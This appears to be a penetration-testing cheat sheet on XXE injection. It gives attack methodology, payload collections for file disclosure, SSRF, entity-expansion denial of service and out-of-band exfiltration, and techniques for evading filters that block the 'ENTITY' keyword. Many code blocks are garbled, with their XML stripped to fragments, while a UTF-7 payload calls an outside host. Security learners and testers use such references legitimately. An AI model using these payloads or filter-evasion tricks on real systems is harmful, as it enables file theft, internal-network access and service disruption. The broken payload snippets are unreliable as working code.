# XXE
## What is XXE (XML External Entity) Vulnerability?
**XML External Entity (XXE)** is a type of vulnerability that occurs when an application processes user-supplied XML data without properly validating it. In XML, the term **Entity** refers to a storage unit of data, which can be internal (within the XML document) or external (an external file or URL). An attacker can exploit XXE to:
* **Read arbitrary files** on the server (e.g., `/etc/passwd`).
* **Make requests** to internal systems (Server-Side Request Forgery, SSRF).
* **Cause denial of service** (DoS) by using large external entities.
* **Exfiltrate data** by sending sensitive information to an external entity controlled by the attacker.
**There are various types of XXE attacks:**
| XXE Attack Type | Description |
| -------------------------------------------------------- | ------------------------------------------------------------------------------------------------------------------ |
| Exploiting XXE to Retrieve Files | Where an external entity is defined containing the contents of a file, and returned in the application's response. |
| Exploiting XXE to Perform SSRF Attacks | Where an external entity is defined based on a URL to a back-end system. |
| Exploiting Blind XXE Exfiltrate Data Out-of-Band | Where sensitive data is transmitted from the application server to a system that the attacker controls. |
| Exploiting blind XXE to Retrieve Data Via Error Messages | Where the attacker can trigger a parsing error message containing sensitive data. |
> **Methodology** [whitechaitai](https://twitter.com/whitechaitai)
1. Convert the content type from "application/json"/"application/x-www-form-urlencoded" to "applcation/xml".
2. File Uploads allows for docx/xlcs/pdf/zip , unzip the package and add your evil xml code into the xml files.
3. If svg allowed in picture upload , you can inject xml in svgs.
4. If the web app offers RSS feeds , add your milicious code into the RSS.
5. Fuzz for /soap api , some applications still running soap apis
6. If the target web app allows for SSO integration, you can inject your milicious xml code in the SAML request/reponse
## Test Payload
#### Using private External Entity[#](https://trojand.com/cheatsheet/Web/XXE_Injection.html#using-private-external-entity)
```xml
]>
&cat;Jerry
```
#### Using a public External Entity[#](https://trojand.com/cheatsheet/Web/XXE_Injection.html#using-a-public-external-entity)
```xml
]>
&cat;Jerry
```
## CDATA
* [ ] XXE that can print XML files through the CDATA:
```xml
">
%dtd;
]>
&wrapper;FIRSTNAME_FILLER
```
* [ ] Inside the `wrapper.dtd` (the external DTD file)
* Its purpose is just to wrap the variables(parameters) into
```xml
```
## **Exploitation**
**LFI Test**
```xml
]>&xxe;
```
**Blind LFI test (when first case doesn't return anything)**
```xml
]>&blind;
```
**Access Control bypass (loading restricted resources - PHP example)**
```xml
]>
∾
```
**SSRF Test**
```xml
">]>&xxe;
```
**XEE (XML Entity Expansion - DOS)**
```xml
]>
&lol9;
```
**XEE #2 (Remote attack - through external xml inclusion)**
```xml
">]>
3..2..1...&test
```
**XXE FTP HTTP Server**
```xml
">
%remote;
%send;
]>
4
File stored on
">
%param1;
```
**XXE UTF-7**
```xml
+ADwAIQ-DOCTYPE foo+AFs +ADwAIQ-ELEMENT foo ANY +AD4
+ADwAIQ-ENTITY xxe SYSTEM +ACI-http://hack-r.be:1337+ACI +AD4AXQA+
+ADw-foo+AD4AJg-xxe+ADsAPA-/foo+AD4
```
To convert between UTF-8 & UTF-7 use recode. `recode UTF8..UTF7 payload-file.xml`
* [ ] [**Blind XXE with out-of-band interaction**](https://portswigger.net/web-security/xxe/blind/lab-xxe-with-out-of-band-interaction)
**Exploit**
```jsx
]>
&xxe;1
```
* [ ] [**Exploiting blind XXE to exfiltrate data using a malicious external DTD**](https://portswigger.net/web-security/xxe/blind/lab-xxe-with-out-of-band-exfiltration)
**External DTD**
```jsx
">
%eval;
%exfil;
```
**Exploit**
```jsx
%xxe;]>
```
* [ ] [**Blind XXE with out-of-band interaction via XML parameter entities**](https://portswigger.net/web-security/xxe/blind/lab-xxe-with-out-of-band-interaction-using-parameter-entities)
**Exploit**
```xml
%xxe; ]>
```
* [ ] [**Exploiting blind XXE to retrieve data via error messages**](https://portswigger.net/web-security/xxe/blind/lab-xxe-with-data-retrieval-via-error-messages) **\[ DTD Blind Out-of-band ]**
> On the exploit server change the hosted file name to /exploit.dtd as the exploit file with Document Type Definition (DTD) extension, containing the following payload. The % is the Unicode hex character code for percent sign %. Parameter entities are referenced using the percent character instead of the usual ampersand.
```xml
">
%eval;
%exfil;
```
> Modify the file upload XML body of the request before sending to the target server.
```xml
%xxe;]>
Carl Toyotacarlos@hacked.net
```
* [ ] [**Exploiting XInclude to retrieve files**](https://portswigger.net/web-security/xxe/lab-xinclude-attack)
> File upload or user import function on web target use XML file format. This can be vulnerable to XML external entity (XXE) injection.
**Identify XML**
> Possible to find XXE attack surface in requests that do not contain any XML.
> To Identify XXE in not so obvious parameters or requests, require adding the below and URL encode the & ampersand symbol to see the response.
`%26entity;`
> Below the server respond with **indication that XML Entities are not allowed for security reasons.**
```xml
URL encode the XXE payload before sending.
```
* [ ] [PortSwigger Lab: Exploiting XXE via image file upload](https://portswigger.net/web-security/xxe/lab-xxe-via-file-upload)
**XXE via SVG Image upload**
> Identify image upload on the blog post function that accept svg images, and observe that the avatars already on blog source code is svg extensions.
> The content of the image.svg file uploaded:
```xml
]>
```
!
* [ ] [**Exploiting XXE to retrieve data by repurposing a local DTD**](https://portswigger.net/web-security/xxe/blind/lab-xxe-trigger-error-message-by-repurposing-local-dtd)
> Systems using the GNOME desktop environment often have a DTD at `/usr/share/yelp/dtd/docbookx.dtd` containing an entity called `ISOamso.`
```xml
">
%eval;
%error;
'>
%local_dtd;
]>
```
**XML External Entity (XXE) Injection Payloads**
**XXE: Basic XML Example**
```xml
JohnDoe
```
**XXE: Entity Example**
```xml
]>
John&example;
```
**XXE: File Disclosure**
```xml
]>
John&ent;
```
**XXE: Denial-of-Service Example**
```xml
&lol9;
```
**XXE: Local File Inclusion Example**
```xml
]>&xxe;
```
**XXE: Blind Local File Inclusion Example (When first case doesn't return anything.)**
```xml
]>&blind;
```
**XXE: Access Control Bypass (Loading Restricted Resources - PHP example)**
```xml
]>
∾
```
**XXE:SSRF ( Server Side Request Forgery ) Example**
```xml
">]>&xxe;
```
**XXE: (Remote Attack - Through External Xml Inclusion) Exmaple**
```xml
">]>
3..2..1...&test
```
**XXE: UTF-7 Exmaple**
```
+ADwAIQ-DOCTYPE foo+AFs +ADwAIQ-ELEMENT foo ANY +AD4
+ADwAIQ-ENTITY xxe SYSTEM +ACI-http://hack-r.be:1337+ACI +AD4AXQA+
+ADw-foo+AD4AJg-xxe+ADsAPA-/foo+AD4
```
**XXE: Base64 Encoded**
```xml
%init; ]>
```
**XXE: XXE inside SOAP Example**
```xml
"> %dtd;]>]]>
```
**XXE: XXE inside SVG**
```svg
```
## Bypassing Filters that Block "ENTITY":
If a web application is filtering or blocking the word "ENTITY" to prevent XXE attacks, there are several **bypass techniques** you can try:
**1. Case Manipulation:**
* Some filters are case-sensitive and may only block the exact string `ENTITY` in uppercase. You can try different cases, such as:
```xml
]>
```
Test variations like:
* ``
* ``
**2. Use Parameter Entities:**
* Instead of defining an external entity directly, you can use **parameter entities** (which start with `%`) to indirectly reference the malicious entity:
```xml
%dtd;
]>
&xxe;
```
The malicious `.dtd` file hosted on `attacker.com` could contain the payload for reading a file.
**3. Hex Encoding:**
* Sometimes, filters may miss encoded characters. You can try encoding the word `ENTITY` using its **hexadecimal** or **decimal** representation in XML:
```xml
]>
```
This encodes "ENTITY" in decimal (69 for 'E', 78 for 'N', etc.). In hex, it would be ``.
**4. Using DTD Chaining:**
* If you have control over external DTDs, you can chain DTDs to bypass filters. This involves referencing a remote DTD file hosted by the attacker:
```xml
%remote;
]>
```
The external DTD file (`external.dtd`) can define the malicious entity, bypassing local filters.
**5. XML Comments:**
* Sometimes filters miss entities hidden inside XML comments. You can obfuscate the payload by breaking the word `ENTITY` into parts:
```xml
-->
]>
```
**6. Base64 Encoding:**
* You might be able to encode the payload and then decode it at runtime. Some parsers allow you to inject **base64-encoded** external entities and decode them:
```xml
]>
&xxe;
```
This base64 string decodes to `/etc/passwd`.
**7. Alternative External Sources (e.g., `SYSTEM` or `PUBLIC`):**
* Instead of using `ENTITY`, try to reference external files or URLs using alternative methods. For example:
```xml
```
Here, the external DTD contains the payload, and you avoid using the `ENTITY` keyword.
## Mitigation:
From a defensive perspective, to mitigate XXE attacks:
* Disable **external entity processing** in XML parsers where it's not needed.
* Use **whitelisting** for acceptable file or URL references in XML files.
* Implement **input validation** to ensure only valid, trusted XML is processed.
* Ensure your application is updated to use parsers that are not vulnerable to XXE by default.
## **References :**
👉 [XML External Entity (XXE) Processing](https://www.owasp.org/index.php/XML_External_Entity_\(XXE\)_Processing)
👉 [XML External Entity Prevention Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.html)
👉 [Testing for XML Injection (OTG-INPVAL-008)](https://www.owasp.org/index.php/Testing_for_XML_Injection_\(OTG-INPVAL-008\))
## Top XXE reports from HackerOne:
1. [XXE at ecjobs.starbucks.com.cn/retail/hxpublic\_v6/hxdynamicpage6.aspx](https://hackerone.com/reports/500515) to Starbucks - 308 upvotes, $4000
2. [XXE on pulse.mail.ru](https://hackerone.com/reports/505947) to Mail.ru - 263 upvotes, $6000
3. [XXE on sms-be-vip.twitter.com in SXMP Processor](https://hackerone.com/reports/248668) to Twitter - 250 upvotes, $10080
4. [XXE on https://duckduckgo.com](https://hackerone.com/reports/483774) to DuckDuckGo - 209 upvotes, $0
5. [Phone Call to XXE via Interactive Voice Response](https://hackerone.com/reports/395296) to ██████ - 170 upvotes, $0
6. [Partial bypass of #483774 with Blind XXE on https://duckduckgo.com](https://hackerone.com/reports/486732) to DuckDuckGo - 151 upvotes, $0
7. [Multiple endpoints are vulnerable to XML External Entity injection (XXE) ](https://hackerone.com/reports/72272)to Pornhub - 136 upvotes, $2500
8. [XXE through injection of a payload in the XMP metadata of a JPEG file](https://hackerone.com/reports/836877) to Informatica - 128 upvotes, $0
9. [XXE Injection through SVG image upload leads to SSRF](https://hackerone.com/reports/897244) to Zivver - 111 upvotes, $0
10. [XXE in Site Audit function exposing file and directory contents](https://hackerone.com/reports/312543) to Semrush - 99 upvotes, $2000
11. [\[RCE\] Unserialize to XXE - file disclosure on ams.upload.pornhub.com](https://hackerone.com/reports/142562) to Pornhub - 89 upvotes, $10000
12. [XXE in DoD website that may lead to RCE](https://hackerone.com/reports/227880) to U.S. Dept Of Defense - 89 upvotes, $0
13. [Blind XXE via Powerpoint files](https://hackerone.com/reports/334488) to Open-Xchange - 86 upvotes, $2000
14. [blind XXE in autodiscover parser](https://hackerone.com/reports/315837) to Mail.ru - 70 upvotes, $5000
15. [LFI and SSRF via XXE in emblem editor](https://hackerone.com/reports/347139) to Rockstar Games - 68 upvotes, $1500
16. [Blind OOB XXE At "http://ubermovement.com/"](https://hackerone.com/reports/154096) to Uber - 55 upvotes, $500
17. [XXE на webdav.mail.ru - PROPFIND/PROPPATCH](https://hackerone.com/reports/758978) to Mail.ru - 54 upvotes, $10000
18. [XXE on ██████████ by bypassing WAF ████](https://hackerone.com/reports/433996) to QIWI - 53 upvotes, $5000
19. [\[rev-app.informatica.com\] - XXE](https://hackerone.com/reports/105434) to Informatica - 44 upvotes, $0
20. [RCE via Local File Read -> php unserialization-> XXE -> unpickling](https://hackerone.com/reports/415501) to h1-5411-CTF - 43 upvotes, $0
21. [XML External Entity (XXE) in qiwi.com + waf bypass](https://hackerone.com/reports/99279) to QIWI - 39 upvotes, $3137
22. [Authenticated XXE](https://hackerone.com/reports/1095645) to WordPress - 39 upvotes, $600
23. [XML Parser Bug: XXE over which leads to RCE](https://hackerone.com/reports/55431) to drchrono - 32 upvotes, $700
24. [XXE on DoD web server](https://hackerone.com/reports/188743) to U.S. Dept Of Defense - 31 upvotes, $0
25. [Singapore - XXE at https://www.starbucks.com.sg/RestApi/soap11](https://hackerone.com/reports/762251) to Starbucks - 28 upvotes, $500
26. [\[app.informaticaondemand.com\] XXE](https://hackerone.com/reports/105753) to Informatica - 24 upvotes, $0
27. [Blind XXE on my.mail.ru](https://hackerone.com/reports/276276) to Mail.ru - 23 upvotes, $800
28. [Non-production Open Database In Combination With XXE Leads To SSRF](https://hackerone.com/reports/742808) to Evernote - 23 upvotes, $0
29. [XXE in upload file feature](https://hackerone.com/reports/105787) to Informatica - 21 upvotes, $0
